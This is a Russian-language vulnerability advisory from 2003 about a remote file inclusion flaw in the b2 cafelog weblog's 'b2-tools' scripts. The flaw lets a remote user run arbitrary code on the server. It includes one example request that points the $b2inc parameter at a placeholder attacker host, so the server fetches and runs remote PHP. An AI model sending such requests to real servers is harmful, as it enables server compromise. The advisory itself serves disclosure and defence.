Выполнение произвольного PHP кода и команд операционной системы в 'b2' Blog 'b2tools'

Дата публикации:
02.06.2003
Всего просмотров:
816
Опасность:
Высокая
Наличие исправления:
Нет
Количество уязвимостей:
1
CVSSv2 рейтинг:
CVE ID:
Нет данных
Вектор эксплуатации:
Удаленная
Воздействие:
Компрометация системы
CWE ID:
Нет данных
Наличие эксплоита:
Нет данных
Уязвимые продукты:
Wordpress 0.x (b2 cafelog)
Описание: Уязвимость обнаружена в 'b2' weblog. Удаленный пользователь может выполнить произвольные команды на целевом сервере.

Сообщается, что сценарии 'blogger-2-b2.php' и 'gm-2-b2.php' в 'b2-tools' каталоге уязвимы к удаленному внедрению произвольного кода.

Удаленный пользователь может определить значение для $b2inc переменной к файлу, расположенному на удаленном сервере, который будет выполнен на целевом сервере, с привилегиями web демона. Пример:

http://[target]/b2-tools/gm-2-b2.php?b2i nc=http://[attacker]
Будет включен файл 'b2functions.php', расположен на удаленном сервере.

Уязвимость обнаружена в 'b2' Blog 'b2tools' 0.6.1

Ссылки: b2 cafelog 0.6.1 remote command execution.

или введите имя

CAPTCHA